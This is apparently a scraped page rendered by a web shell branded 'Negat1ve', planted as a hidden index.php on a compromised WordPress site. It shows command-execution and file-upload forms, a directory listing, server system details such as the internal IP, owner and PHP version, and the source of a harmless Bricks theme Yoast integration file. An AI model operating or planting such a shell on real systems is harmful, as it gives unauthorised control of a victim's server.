Linux webm017.cluster127.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
10.127.20.17
/
home
/
m
/
a
/
t
/
matisecojj
/
pre-prod
/
wp-content
/
themes
/
bricks
/
includes
/
integrations
/
yoast
[ HOME ]
Exec
Submit
yoast.php
<?php namespace Bricks\Integrations\Yoast; if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly class Yoast { public function __construct() { if ( ! class_exists( 'WPSEO_Options' ) ) { return; } add_action( 'wp_enqueue_scripts', [ $this, 'wp_enqueue_scripts' ], 10 ); add_action( 'admin_enqueue_scripts', [ $this, 'wp_enqueue_scripts' ], 10 ); } /** * Add Bricks integration with Yoast SEO to to the Gutenberg editor * * @since 1.11 */ public function wp_enqueue_scripts( $hook_suffix ) { if ( bricks_is_builder() || ( is_admin() && $hook_suffix == 'post.php' ) ) { wp_enqueue_script( 'bricks-yoast', BRICKS_URL_ASSETS . 'js/integrations/yoast.min.js', [], filemtime( BRICKS_PATH_ASSETS . 'js/integrations/yoast.min.js' ), true ); if ( bricks_is_builder() ) { $nonce = wp_create_nonce( 'bricks-nonce-builder' ); } elseif ( is_admin() ) { $nonce = wp_create_nonce( 'bricks-nonce-admin' ); } else { $nonce = wp_create_nonce( 'bricks-nonce' ); } wp_localize_script( 'bricks-yoast', 'bricksYoast', [ 'postId' => get_the_ID(), 'nonce' => $nonce, 'ajaxUrl' => admin_url( 'admin-ajax.php' ), 'renderWithBricks' => \Bricks\Helpers::render_with_bricks(), 'contentData' => '', 'postIsUpdated' => false, ] ); } } }
Submit
Copy
Back
Folder Name
Submit
File Name
File Content
Submit
System Information
Uname > Linux webm017.cluster127.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64 Software > Apache PHP > 8.1.33 Protocol > HTTP/1.1 IP / Port > 10.127.20.17 / 443 Mail > ON Curl > ON Owner > matisecojj MySQL > OFF Disable Function > _dyuweyrj4,_dyuweyrj4r,dl
*ReClick For Close
File : Negat1ve /JFR/.thumb35363/index.php
Name
Type
Size
Owner/Group
Permission
Last Modified
Actions
.
dir
-
matisecojj/users
0755
2024-11-12 08:37:32
..
dir
-
matisecojj/users
0755
2024-11-12 08:37:31
yoast.php
text/x-php
1.33 KB
matisecojj/users
0644
2024-11-12 08:37:32
© Negat1ve